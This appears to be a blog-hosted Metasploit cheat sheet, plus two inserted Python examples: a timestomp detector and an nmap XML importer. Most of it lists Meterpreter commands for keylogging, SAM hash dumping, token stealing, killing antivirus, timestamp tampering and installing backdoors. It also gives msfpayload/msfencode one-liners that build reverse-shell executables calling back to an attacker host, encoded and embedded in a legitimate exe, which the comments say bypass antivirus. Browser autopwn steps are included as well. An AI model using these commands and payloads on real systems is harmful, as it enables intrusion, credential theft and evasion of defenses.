Fi8sVrs

Metasploit Notes

Meterpreter

Process:

getuid : shows user id
getpid : shows meterpreter process id
ps : lists running processes
migrate [pid] : migrates to given process (one that won't end/crash)

KeyLog: Ensure you are monitoring the correct session (explorer.exe/winlogon.exe)

idletime : shows how long machine has been idle for
keyscan_start : starts the key logger
keyscan_dump : outputs captured data
keyscan_stop : stops the keylogger

Channels: This allows you to do more than one thing at a time in meterpreter

execute -f cmd.exe -c : opens a new cmd.exe and creates a new channel for it
channel -l : lists the open channels
read [channel] : outputs data from channel
interact [channel] : allows you to jump into the channel
write [channel] : sends data to the channel
close [channel] : kills the channel

Session: Session 0 is the local desktop. Session 1+ are RDP sessions.

enumdesktops : shows currently open desktops such as winlogon etc
getdesktop : shows current desktop session meterpreter is in
setdesktop : changes to an already open desktop session
uictl disable keyboard : disables the keyboard of the desktop session

FileEdit: Ability to edit file attributes such as MACE

timestomp file.txt -c "30/12/1980 12:12:34" : changes the timestamp of the file
timestomp file.txt -f sourcefile.txt : copies timestamp from sourcefile.txt
use priv : loads the priv extras
hashdump : dumps the SAM file
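A forensic counterpart to the timestomp lines above, added here as an example (not Metasploit code): it flags the artifacts timestomping leaves in stat() timestamps. It assumes a filesystem that stores sub-second times (NTFS, ext4, xfs); on FAT or other one-second filesystems, and for files copied from such media, the zero-fraction check fires for every file.

```python
import os
import time

NS_PER_S = 1_000_000_000


def timestamp_indicators(atime_ns, mtime_ns, ctime_ns, birthtime_ns=None, now_ns=None):
    """Return indicator strings for one file's timestamps (all in nanoseconds).

    - all stamps have a zero sub-second part: timestomp sets times at whole-second
      granularity, while ordinary filesystem writes almost never land on .000000000
    - mtime earlier than creation time: a file cannot change before it exists
    - any stamp later than the reference clock
    """
    now_ns = time.time_ns() if now_ns is None else now_ns
    stamps = {"atime": atime_ns, "mtime": mtime_ns, "ctime": ctime_ns}
    if birthtime_ns is not None:
        stamps["birthtime"] = birthtime_ns
    found = []
    if all(ns % NS_PER_S == 0 for ns in stamps.values()):
        found.append("all timestamps have zero sub-second precision")
    if birthtime_ns is not None and mtime_ns < birthtime_ns:
        found.append("mtime earlier than creation time")
    found.extend(f"{name} is in the future" for name, ns in stamps.items() if ns > now_ns)
    return found


def scan_file(path, now_ns=None):
    """stat() one file and run the checks; birth time is only exposed on some platforms."""
    st = os.stat(path)
    birth = getattr(st, "st_birthtime_ns", None)
    return timestamp_indicators(st.st_atime_ns, st.st_mtime_ns, st.st_ctime_ns, birth, now_ns)


def scan_tree(root, now_ns=None):
    """Walk a directory and return {path: indicators} for files that trip any check."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                indicators = scan_file(path, now_ns)
            except OSError:  # unreadable or vanished file: skip, do not abort the sweep
                continue
            if indicators:
                hits[path] = indicators
    return hits
```

Run scan_tree() over a directory of interest and review the hits by hand; a zero fraction on its own is a lead, not proof, so correlate with the second and third checks and with the NTFS $FILE_NAME times, which timestomp does not rewrite.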

Tokens: Incognito allows token stealing and other token functions

use incognito : loads incognito into meterpreter
list_tokens -u : shows stealable tokens
impersonate_token : allows a token to be stolen
steal_token [pid] : allows ability to steal token of a process
rev2self : reverts to original token
run post/windows/gather/cachedump : gets cached domain hashes

need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather

Sniffer: Allows promiscuous mode to be enabled

use sniffer : loads the sniffer functions
sniffer_interfaces : lists interfaces 1,2,3,4,5,6,etc
sniffer_start [n] : starts the sniffer for the interface
sniffer_stats [n] : lists packets, time, etc..
sniffer_dump [n] file.pcap : dumps the capture locally
sniffer_stop : you guessed it

Meterpreter Scripts: These scripts perform various functions on the victim

run checkvm : checks if the target is a vm
run credcollect : dumps hashes and tokens to screen
run enum_firefox : dumps temp internet files from firefox - cookies, passwords, etc
run get_application_list : shows installed applications
run killav : tries to stop all known AV progs
run get_local_subnets : enumerates local subnet info
run metsvc : creates a backdoor
run persistence : survives a reboot (without admin or system)
run scheduleme -e file.exe -m 30 : you'll need to manually load the meterpreter.exe payload
run kitrap0d : allows priv escalation using CVE-2010-0232

web browser exploit

use auxiliary/server/browser_autopwn
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)

Inbuilt sqlite db

db_driver sqlite3 : starts the db using sqlite (file based)
db_connect job : creates a new db called job and connects to it
db_hosts : shows hosts
db_services : shows visible services
db_nmap -sS [target_ip] : performs nmap against target and stores in db
db_import_nmap_xml : allows import of nmap XML output
db_autopwn -p -e -r -t : autopwn from db vulns
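A minimal stand-in for the db_import_nmap_xml / db_hosts / db_services workflow, added here as an example and not Metasploit's own db code: it loads nmap -oX output into an in-memory SQLite inventory with the same host/service split. The sample XML is constructed, not real scan output.

```python
import sqlite3
import xml.etree.ElementTree as ET

SCHEMA = """CREATE TABLE IF NOT EXISTS hosts (address TEXT PRIMARY KEY, hostname TEXT, state TEXT);
CREATE TABLE IF NOT EXISTS services (address TEXT, port INTEGER, proto TEXT, state TEXT,
    name TEXT, info TEXT, PRIMARY KEY (address, port, proto));"""

# Constructed sample in nmap -oX format (not real scan output).
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
 <hostnames><hostname name="files.example.test"/></hostnames><ports>
  <port protocol="tcp" portid="22"><state state="open"/>
   <service name="ssh" product="OpenSSH" version="8.9"/></port>
  <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
  <port protocol="tcp" portid="3389"><state state="closed"/></port>
 </ports></host>
<host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/><ports/></host>
</nmaprun>"""

def attr(elem, key, default=None):
    """Attribute of an optional element (nmap omits <service> for unidentified ports)."""
    return default if elem is None else elem.get(key, default)

def import_nmap_xml(xml_text, conn=None):
    """Load nmap XML into the tables; INSERT OR REPLACE means a rescan updates rows."""
    conn = conn or sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for host in ET.fromstring(xml_text).iter("host"):
        ip = attr(host.find("address[@addrtype='ipv4']"), "addr")
        if ip is None:  # skip hosts with no IPv4 address
            continue
        conn.execute("INSERT OR REPLACE INTO hosts VALUES (?,?,?)",
                     (ip, attr(host.find("hostnames/hostname"), "name"),
                      attr(host.find("status"), "state", "unknown")))
        for port in host.iterfind("ports/port"):
            svc = port.find("service")
            info = " ".join(filter(None, (attr(svc, "product"), attr(svc, "version"))))
            conn.execute("INSERT OR REPLACE INTO services VALUES (?,?,?,?,?,?)",
                         (ip, int(port.get("portid")), port.get("protocol"),
                          attr(port.find("state"), "state"), attr(svc, "name"), info or None))
    conn.commit()
    return conn

def db_hosts(conn):
    return conn.execute("SELECT address, hostname, state FROM hosts ORDER BY address").fetchall()

def db_services(conn, state="open"):
    return conn.execute("SELECT address, port, proto, name, info FROM services "
                        "WHERE state = ? ORDER BY address, port", (state,)).fetchall()
```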

Meterpreter Payload Backdoor

./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
# sets the payload as meterpreter and then encodes it 5 times to bypass AV
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E

One Liners

# One liner meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 X > /root/clear.exe
# One liner shikata encoded meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe

# One liner encoded and hidden in windows exe meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5

Metasploit Notes | phillips321.co.uk
